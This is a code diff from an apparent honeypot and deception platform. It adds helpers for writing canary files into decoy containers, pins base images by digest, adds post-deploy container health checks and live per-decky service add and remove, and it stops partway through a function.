--- a/decnet/decky_io/init.py
+++ b/decnet/decky_io/init.py
@@ -0,0 +1,39 @@
 """Shared primitives for writing/deleting files inside running deckies.
 The canary planter and the orchestrator SSH driver both need to drop
 bytes into a decky container's filesystem, then sometimes unlink them.
 The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
 before this module existed.
 Public API:
 * :func:`write_file_to_container` — write bytes at a path, set mode,
  optionally backdate mtime.
 * :func:`delete_file_from_container` — best-effort ``rm -f``.
 * :func:`resolve_topology_container` — pick the right docker container
  for a MazeNET decky based on its services list.
 * :func:`resolve_decky_container` — async helper that takes
  ``(decky_name, topology_id?)``, hydrates the topology when needed,
  and returns the docker container name.
 Container resolution conventions are documented in
 :mod:`decnet.topology.compose`; we mirror them here without taking
 a runtime dependency on the compose generator.
 """
 from __future__ import annotations
 from .resolve import (
    resolve_decky_container,
    resolve_topology_container,
 )
 from .write import (
    delete_file_from_container,
    write_file_to_container,
 )
 __all__ = [
    "delete_file_from_container",
    "resolve_decky_container",
    "resolve_topology_container",
    "write_file_to_container",
 ]
--- a/decnet/decky_io/resolve.py
+++ b/decnet/decky_io/resolve.py
@@ -0,0 +1,72 @@
 """Decky-name → docker container name resolution.
 Two scopes:
 * **Fleet**: every fleet decky has a ``ssh`` service container named
  ``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`).  We always
  target it because it carries the most realistic filesystem layout.
 * **MazeNET (topology)**: same ``<name>-ssh`` convention when the
  decky exposes the ssh service; otherwise the decky's base container
  named ``decnet_t_<topology_id8>_<decky_name>`` (matches
  :func:`decnet.topology.compose._container_name`).
 Keeping resolution centralised here means new ``docker exec`` callers
 (file drops, future bulk planters, etc.) never need to learn the
 naming conventions — they just call :func:`resolve_decky_container`.
 """
 from __future__ import annotations
 from typing import Any, Iterable, Optional
 _SSH_CONTAINER_SUFFIX = "-ssh"
 def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
 ) -> str:
    """Container name for a MazeNET decky.
    See module docstring for the convention.  Pure function — no I/O.
    """
    if "ssh" in set(services):
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
    return f"decnet_t_{topology_id[:8]}_{decky_name}"
 async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
 ) -> str:
    """Resolve the docker container name for *decky_name*.
    Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
    unconditionally.  No DB lookup — the caller is responsible for
    knowing the decky exists; if it doesn't, the subsequent
    ``docker exec`` returns a clear error.
    Topology path: hydrates the topology, looks up the decky's services
    list, delegates to :func:`resolve_topology_container`.
    Raises:
        LookupError — when ``topology_id`` is set but the topology or
        its named decky doesn't exist.  Callers translate this into
        404/422 at the API layer.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
    from decnet.topology.persistence import hydrate
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        raise LookupError(f"topology {topology_id!r} not found")
    for decky in hydrated["deckies"]:
        cfg = decky.get("decky_config") or {}
        name = cfg.get("name") or decky.get("name")
        if name == decky_name:
            services = decky.get("services") or []
            return resolve_topology_container(topology_id, decky_name, services)
    raise LookupError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
--- a/decnet/decky_io/write.py
+++ b/decnet/decky_io/write.py
@@ -0,0 +1,124 @@
 """``docker exec``-driven file write/delete inside a decky container.
 The write path streams a base64-encoded payload over stdin to
 ``base64 -d`` inside the container, so binary content of any size up
 to docker's stream limits is safe — interpolating bytes into argv
 would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
 """
 from __future__ import annotations
 import asyncio
 import base64
 import shlex
 from datetime import datetime, timezone
 from typing import Optional
 from decnet.logging import get_logger
 log = get_logger("decky_io.write")
 _DOCKER = "docker"
 _DEFAULT_TIMEOUT = 8.0
 def _dirname(path: str) -> str:
    idx = path.rfind("/")
    if idx <= 0:
        return "/"
    return path[:idx]
 async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
 ) -> tuple[int, str, str]:
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            pass
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
 async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
 ) -> tuple[bool, Optional[str]]:
    """Write *content* to *path* inside *container* via ``docker exec``.
    The directory above *path* is created if missing; *mode* is applied
    after the write; when *mtime* is provided the file is backdated via
    ``touch -d`` (UTC ISO 8601).
    Returns ``(success, error_or_none)``.  ``error`` is the trimmed
    docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
    """
    if not path:
        return False, "empty path"
    encoded = base64.b64encode(content)
    parts = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {shlex.quote(path)}",
        f"chmod {mode:o} {shlex.quote(path)}",
    ]
    if mtime is not None:
        ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
    sh_cmd = " && ".join(parts)
    argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
    rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
    success = rc == 0
    if success:
        return True, None
    err = stderr.strip()[:256] or f"rc={rc}"
    log.warning(
        "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
        container, path, rc, stderr[:120],
    )
    return False, err
 async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
 ) -> tuple[bool, Optional[str]]:
    """Best-effort ``rm -f`` of *path* inside *container*.
    Returns ``(success, error_or_none)``.  ``rm -f`` returns rc=0 even
    when the file is already gone, so a True result here means "the
    file is not present after this call", regardless of who unlinked it.
    """
    sh_cmd = f"rm -f {shlex.quote(path)}"
    argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
    rc, _stdout, stderr = await _run(argv, timeout=timeout)
    if rc == 0:
        return True, None
    return False, stderr.strip()[:256] or f"rc={rc}"
--- a/decnet/distros.py
+++ b/decnet/distros.py
@@ -18,69 +18,86 @@ class DistroProfile:
    build_base: str     # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
 # Base images are pinned by digest (sha256) to make `docker pull`
 # reproducible — a registry-side rebuild of "debian:bookworm-slim"
 # can't silently swap content under us.  The :tag is kept for human
 # readability; the @sha256 is what Docker actually resolves.
 # Refresh procedure: `docker pull <tag>` then `docker inspect
 # --format '{{index .RepoDigests 0}}' <tag>`.  Last refreshed 2026-05-03.
 _DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
 _UBUNTU_22_04    = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
 _UBUNTU_20_04    = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
 _ROCKY_9         = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
 _CENTOS_7        = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
 _ALPINE_3_19     = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
 _FEDORA_39       = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
 _KALI_ROLLING    = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
 _ARCH_LATEST     = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
 DISTROS: dict[str, DistroProfile] = {
    "debian": DistroProfile(
        slug="debian",
-        image="debian:bookworm-slim",
+        image=_DEBIAN_BOOKWORM,
        display_name="Debian 12 (Bookworm)",
        hostname_style="generic",
-        build_base="debian:bookworm-slim",
+        build_base=_DEBIAN_BOOKWORM,
    ),
    "ubuntu22": DistroProfile(
        slug="ubuntu22",
-        image="ubuntu:22.04",
+        image=_UBUNTU_22_04,
        display_name="Ubuntu 22.04 LTS (Jammy)",
        hostname_style="generic",
-        build_base="ubuntu:22.04",
+        build_base=_UBUNTU_22_04,
    ),
    "ubuntu20": DistroProfile(
        slug="ubuntu20",
-        image="ubuntu:20.04",
+        image=_UBUNTU_20_04,
        display_name="Ubuntu 20.04 LTS (Focal)",
        hostname_style="generic",
-        build_base="ubuntu:20.04",
+        build_base=_UBUNTU_20_04,
    ),
    "rocky9": DistroProfile(
        slug="rocky9",
-        image="rockylinux:9-minimal",
+        image=_ROCKY_9,
        display_name="Rocky Linux 9",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "centos7": DistroProfile(
        slug="centos7",
-        image="centos:7",
+        image=_CENTOS_7,
        display_name="CentOS 7",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "alpine": DistroProfile(
        slug="alpine",
-        image="alpine:3.19",
+        image=_ALPINE_3_19,
        display_name="Alpine Linux 3.19",
        hostname_style="minimal",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "fedora": DistroProfile(
        slug="fedora",
-        image="fedora:39",
+        image=_FEDORA_39,
        display_name="Fedora 39",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "kali": DistroProfile(
        slug="kali",
-        image="kalilinux/kali-rolling",
+        image=_KALI_ROLLING,
        display_name="Kali Linux (Rolling)",
        hostname_style="rolling",
-        build_base="kalilinux/kali-rolling",  # Debian-based, apt-get compatible
+        build_base=_KALI_ROLLING,  # Debian-based, apt-get compatible
    ),
    "arch": DistroProfile(
        slug="arch",
-        image="archlinux:latest",
+        image=_ARCH_LATEST,
        display_name="Arch Linux",
        hostname_style="rolling",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
 }
--- a/decnet/engine/deployer.py
+++ b/decnet/engine/deployer.py
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
 """
 import asyncio
 import json
 import shutil
 import subprocess  # nosec B404
 import time
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
 _AUTH_HELPER_SERVICES = {"ssh", "telnet"}
 _CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
 _NTLMSSP_SERVICES = {"smb", "rdp"}
 _CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
 _CADDY_SERVICES = {"http", "https"}
 def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
                    shutil.copy2(src, dest)
 def _chown_tree(dest: Path, owner_ref: Path) -> None:
    """Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
    import os
    if os.geteuid() != 0:
        return
    st = owner_ref.stat()
    uid, gid = st.st_uid, st.st_gid
    targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
    for p in targets:
        try:
            os.lchown(p, uid, gid)
        except OSError:
            pass
 def _sync_caddy_modules(config: DecnetConfig) -> None:
    """Mirror _caddy_modules/ into http/https build contexts.
    The xcaddy builder stage in each Dockerfile references
    ``_caddy_modules/decnetfp`` relative to its build context (the
    per-service template dir). Since the canonical source lives one
    level up at ``templates/_caddy_modules/``, we sync it into each
    active http/https build context before compose up, mirroring the
    sessrec / auth-helper patterns.
    """
    from decnet.services.registry import get_service
    src_dir = _CANONICAL_CADDY_MODULES_DIR
    if not src_dir.is_dir():
        return
    seen: set[Path] = set()
    for decky in config.deckies:
        for svc_name in decky.services:
            if svc_name not in _CADDY_SERVICES:
                continue
            svc = get_service(svc_name)
            if svc is None:
                continue
            ctx = svc.dockerfile_context()
            if ctx is None or ctx in seen:
                continue
            seen.add(ctx)
            dest_dir = ctx / "_caddy_modules"
            dest_dir.mkdir(exist_ok=True)
            for child in src_dir.iterdir():
                dest_child = dest_dir / child.name
                if child.is_dir():
                    if dest_child.exists():
                        shutil.rmtree(dest_child)
                    shutil.copytree(child, dest_child)
                    _chown_tree(dest_child, src_dir)
                else:
                    if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
                        shutil.copy2(child, dest_child)
                        _chown_tree(dest_child, src_dir)
 def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
    """Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
    Used for post-deploy verification: ``compose up -d`` returns 0 the
    moment containers are *started*, but a service that crashes on boot
    (port collision, bad image, missing dependency) only shows up here.
    Returns an empty list when compose has nothing to report (and on
    parse failure — caller treats that as 'unverifiable, don't gate').
    """
    cmd = [
        "docker", "compose", "-p", "decnet", "-f", str(compose_file),
        "ps", "--all", "--format", "json",
    ]
    try:
        result = subprocess.run(  # nosec B603
            cmd, capture_output=True, text=True, check=False,
        )
    except FileNotFoundError:
        return []
    if result.returncode != 0:
        return []
    rows: list[dict[str, object]] = []
    # ``docker compose ps --format json`` emits one JSON object per line
    # (newline-delimited), not a JSON array.  Parse line-by-line so a
    # single bad line doesn't poison the whole result.
    for line in (result.stdout or "").splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict):
            rows.append(obj)
        elif isinstance(obj, list):
            for item in obj:
                if isinstance(item, dict):
                    rows.append(item)
    return rows
 def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
    import os
    # -p decnet pins the compose project name. Without it, docker compose
@@ -393,6 +494,8 @@ def _compose_with_retry(
                console.print(f"[red]{result.stderr.strip()}[/]")
                log.error("docker compose %s failed after %d attempts: %s",
                          " ".join(args), retries, result.stderr.strip())
    if last_exc is None:  # pragma: no cover — retries=0 is not a supported call
        raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
    raise last_exc
@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
    _sync_sessrec_sources(config)
    _sync_auth_helper_sources(config)
    _sync_ntlmssp_sources(config)
    _sync_caddy_modules(config)
    compose_path = write_compose(config, COMPOSE_FILE)
    console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
        )
        raise
-    await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
+    # Post-deploy verification: ``compose up -d`` returns 0 the moment
-    log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
+    # containers are *started*, so a service that crashes on boot
    # (port bind failure, bad image, missing dependency) leaves the
    # topology row sitting at ACTIVE while half the substrate is dead.
    # Sample compose ps once and downgrade to DEGRADED if any expected
    # container isn't running — operators see real state instead of an
    # optimistic flag.
    ps_rows = await anyio.to_thread.run_sync(
        lambda: _compose_ps(compose_path),
    )
    bad: list[str] = []
    # Build the per-decky state map.  The base container's compose
    # service name == decky name, which is what we cache on the
    # TopologyDecky row.  Service containers (named ``<decky>-<svc>``)
    # don't gate the decky's state — service-level failures are visible
    # in compose ps separately and don't downgrade the decky as a whole.
    decky_state_by_name: dict[str, str] = {}
    for row in ps_rows:
        state = str(row.get("State", "")).lower()
        service_name = str(row.get("Service") or "")
        if service_name and "-" not in service_name:
            # Plain decky base; cache its docker state.
            decky_state_by_name[service_name] = state or "unknown"
        if state and state != "running":
            name = str(row.get("Name") or row.get("Service") or "?")
            exit_code = row.get("ExitCode")
            bad.append(
                f"{name}={state}"
                + (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
            )
    # Reconcile each TopologyDecky.state from compose's view.  Without
    # this, the row stays at the default 'pending' forever and the
    # dashboard's ACTIVE DECKIES count reads 0/N even when everything's
    # actually up.
    for decky in hydrated["deckies"]:
        cfg = decky.get("decky_config") or {}
        decky_name = cfg.get("name") or decky.get("name")
        if not decky_name:
            continue
        ds = decky_state_by_name.get(decky_name, "unknown")
        new_state = "running" if ds == "running" else "failed"
        try:
            await repo.update_topology_decky(
                decky["uuid"], {"state": new_state},
            )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "post-deploy state reconcile failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )
    if bad:
        reason = "post-deploy check: " + ", ".join(bad[:8]) + (
            f" and {len(bad) - 8} more" if len(bad) > 8 else ""
        )
        await transition_status(
            repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
        )
        log.warning(
            "topology %s deployed but %d container(s) unhealthy: %s",
            topology_id, len(bad), reason,
        )
    else:
        await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
        log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
    # Best-effort canary baseline seed across every decky in the
    # topology.  Same resilience contract as the fleet path: failures
    # surface as state=failed token rows, never abort the deploy.
    try:
        from decnet.canary import planter as _canary_planter
        await _canary_planter.seed_baseline_topology(repo, topology_id)
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "canary baseline seed failed (best-effort) topology=%s err=%s",
            topology_id, exc,
        )
@_traced("engine.teardown_topology")
--- a/decnet/engine/services_live.py
+++ b/decnet/engine/services_live.py
@@ -0,0 +1,673 @@
 """Add/remove a single service on a deployed decky without full redeploy.
 The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
 supports per-service targeting (``up --no-deps -d <svc>``,
 ``stop <svc>``, ``rm -f <svc>``).  What was missing was the
 orchestration: regenerate the compose file (so future redeploys reflect
 the change), persist the new ``services`` list, and run the targeted
 compose command.
 Two scopes:
 * **Topology** — source of truth is the ``topology_deckies`` table; the
  compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
 * **Fleet** — source of truth is ``decnet-state.json`` (with the
  ``fleet_deckies`` table mirroring it); compose is the unihost
  ``decnet-compose.yml``.
 Both publish ``decky.<name>.service.added`` /
 ``decky.<name>.service.removed`` on the bus.  The new topic constants
 are documented in ``wiki-checkout/Service-Bus.md``.
 """
 from __future__ import annotations
 import subprocess  # nosec B404
 from pathlib import Path
 from typing import Any, Literal, Optional
 import anyio
 from decnet.bus import topics
 from decnet.logging import get_logger
 from decnet.services.base import BaseService
 from decnet.services.registry import get_service
 from decnet.topology.persistence import hydrate
 from decnet.web.db.repository import BaseRepository
 # Heavy imports (composer/deployer pull in decnet.network → docker) are
 # deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
 # / ``_load_state`` indirection helpers below.  Mirrors the lazy-import
 # pattern in decnet.canary.planter for the same reason.
 def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
    """Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
    Real implementation lives in :mod:`decnet.engine.deployer`; we
    import-and-delegate at call time to keep this module's import graph
    clean (see module docstring above).
    """
    from decnet.engine.deployer import _compose as _real_compose
    if compose_file is None:
        _real_compose(*args, env=env)
    else:
        _real_compose(*args, compose_file=compose_file, env=env)
 def _topology_compose_path(topology_id: str) -> Path:
    from decnet.engine.deployer import _topology_compose_path as _real_path
    return _real_path(topology_id)
 def _write_topology_compose(hydrated, path: Path) -> Path:
    from decnet.topology.compose import write_topology_compose
    return write_topology_compose(hydrated, path)
 def _load_state():
    from decnet.config import load_state as _real_load_state
    return _real_load_state()
 def _save_state(config, compose_path) -> None:
    from decnet.config import save_state as _real_save_state
    _real_save_state(config, compose_path)
 def _write_compose(config, compose_path) -> None:
    from decnet.composer import write_compose as _real_write_compose
    _real_write_compose(config, compose_path)
 def _get_bus():
    from decnet.bus.factory import get_bus
    return get_bus()
 # --------------------------- swarm propagation helpers ---------------------------
 #
 # Service mutations (add/remove/update_config) on a deployed decky used to run
 # the master's local docker-compose only.  For swarm fleet deckies the master
 # has no containers; for agent-targeted topologies the master only writes a
 # compose file the worker never sees.  These helpers replay the change to the
 # worker so the env actually lands.
 #
 # Lazy imports keep this module's import graph clean (composer/swarm pull in
 # decnet.network → docker, mirroring the pattern used elsewhere in this file).
 async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
    """Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
    shards = await repo.list_decky_shards()
    for s in shards:
        if s.get("decky_name") == decky_name:
            return s.get("host_uuid")
    return None
 async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Re-push the host's full shard to its worker agent.
    Uses the same code path as POST /swarm/deploy: load master state, filter
    to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
    The agent regenerates compose and recreates only the changed containers.
    Idempotent for unchanged deckies.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
    state = _load_state()
    if state is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return
    config, _compose_path = state
    host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
    if not host_deckies:
        log.warning(
            "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
            host_uuid,
        )
        return
    filtered = config.model_copy(update={"deckies": host_deckies})
    await dispatch_decnet_config(filtered, repo)
 async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """If the topology is agent-pinned, push the latest hydrated blob to the worker."""
    from decnet.engine.deployer import resync_agent_topology
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        return
    if not hydrated.get("topology", {}).get("target_host_uuid"):
        return  # unihost topology — local compose is authoritative
    await resync_agent_topology(repo, topology_id)
 log = get_logger("engine.services_live")
 DeckyKind = Literal["fleet", "topology"]
 class ServiceMutationError(ValueError):
    """Raised for caller-correctable failures.  The API layer dispatches on
    subclass to produce 4xx codes; base class maps to 422.
    """
 class ServiceNotFoundError(ServiceMutationError):
    """Decky or topology does not exist → 404."""
 class ServiceConflictError(ServiceMutationError):
    """Idempotency violation (already on / not on) → 409."""
 def _validate_service_for_per_decky(name: str) -> BaseService:
    """Return the registered service or raise ``ServiceMutationError``.
    ``fleet_singleton`` services run once per fleet (e.g. an LLMNR
    responder), not per-decky — we reject the per-decky add/remove
    request rather than silently producing a no-op compose entry.
    """
    try:
        svc = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc
    if svc.fleet_singleton:
        raise ServiceMutationError(
            f"service {name!r} is fleet_singleton; not addable per-decky"
        )
    return svc
 async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Best-effort bus publish — same shape as the canary planter's helper."""
    try:
        bus = _get_bus()
        await bus.connect()
        await bus.publish(topic, payload)
        await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
 # ---------------------------------------------------------- topology path
 async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
 ) -> dict[str, Any]:
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")
    for d in hydrated["deckies"]:
        cfg = d.get("decky_config") or {}
        name = cfg.get("name") or d.get("name")
        if name == decky_name:
            return d
    raise ServiceNotFoundError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
 async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
 ) -> Path:
    """Re-hydrate + re-render the per-topology compose file.
    Called after a successful DB update so future deploys reflect the
    change; without this the file would still describe the old service
    set and a subsequent ``up -d`` would resurrect the removed service.
    """
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    path = _topology_compose_path(topology_id)
    _write_topology_compose(hydrated, path)
    return path
 async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
 ) -> list[str]:
    decky = await _topology_decky(repo, topology_id, decky_name)
    services: list[str] = list(decky.get("services") or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)
    update: dict[str, Any] = {"services": services}
    # If the caller supplied initial config, fold it into decky_config
    # BEFORE compose regen so the first ``up`` materialises the env on
    # the new container — no follow-up apply needed.
    if initial_config:
        cfg_blob = dict(decky.get("decky_config") or {})
        sc = dict(cfg_blob.get("service_config") or {})
        sc[service_name] = initial_config
        cfg_blob["service_config"] = sc
        update["decky_config"] = cfg_blob
    await repo.update_topology_decky(decky["uuid"], update)
    compose_path = await _rerender_topology_compose(repo, topology_id)
    if await _topology_is_agent_pinned(repo, topology_id):
        # Agent-pinned: the master's local compose has nothing to up.
        # Push the new hydrated blob to the worker.
        await _resync_agent_topology(repo, topology_id)
    else:
        target = f"{decky_name}-{service_name}"
        # Run compose in a worker thread so the API event loop stays
        # responsive — same pattern as engine/deployer.deploy_topology.
        await anyio.to_thread.run_sync(
            lambda: _compose(
                "up", "-d", "--no-deps", "--build", target,
                compose_file=compose_path,
            ),
        )
    return services
 async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        return False
    return bool(hydrated.get("topology", {}).get("target_host_uuid"))
 async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
 ) -> list[str]:
    decky = await _topology_decky(repo, topology_id, decky_name)
    services: list[str] = list(decky.get("services") or [])
    if service_name not in services:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services = [s for s in services if s != service_name]
    target = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
    if not agent_pinned:
        # Stop + rm before persisting + re-rendering so a half-completed
        # mutation leaves the operator a clear state to retry from
        # (container still running; DB still says service is on).
        await anyio.to_thread.run_sync(
            lambda: _compose("stop", target, compose_file=compose_path),
        )
        await anyio.to_thread.run_sync(
            lambda: _compose("rm", "-f", target, compose_file=compose_path),
        )
    await repo.update_topology_decky(decky["uuid"], {"services": services})
    await _rerender_topology_compose(repo, topology_id)
    if agent_pinned:
        # Worker tears down the removed service when it diffs the
        # incoming hydrated blob against its current state.
        await _resync_agent_topology(repo, topology_id)
    return services
 # ---------------------------------------------------------- fleet path
 def _fleet_state_or_raise() -> tuple[Any, Path]:
    state = _load_state()
    if state is None:
        raise ServiceMutationError(
            "no fleet state on disk — run `decnet up` first"
        )
    return state
 def _fleet_find_decky(config: Any, decky_name: str) -> Any:
    for d in config.deckies:
        if d.name == decky_name:
            return d
    raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
 async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
 ) -> None:
    """Persist the mutation to JSON state, compose file, and the DB row."""
    config, _ = _load_state()
    target = _fleet_find_decky(config, decky.name)
    target.services = services
    _save_state(config, compose_path)
    _write_compose(config, compose_path)
    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL
    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
 async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
 ) -> list[str]:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    services: list[str] = list(decky.services or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)
    if initial_config:
        # Same path as _update_fleet_service_config: stash the validated
        # cfg on the decky model so the compose write picks it up.
        sc = dict(getattr(decky, "service_config", None) or {})
        sc[service_name] = initial_config
        decky.service_config = sc
    await _persist_fleet_change(repo, decky, services, compose_path)
    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        # Master has no container for this decky — re-push the host's
        # shard so the worker materialises the new service.
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    else:
        target = f"{decky_name}-{service_name}"
        await anyio.to_thread.run_sync(
            lambda: _compose(
                "up", "-d", "--no-deps", "--build", target,
                compose_file=compose_path,
            ),
        )
    return services
 async def _remove_fleet_service(
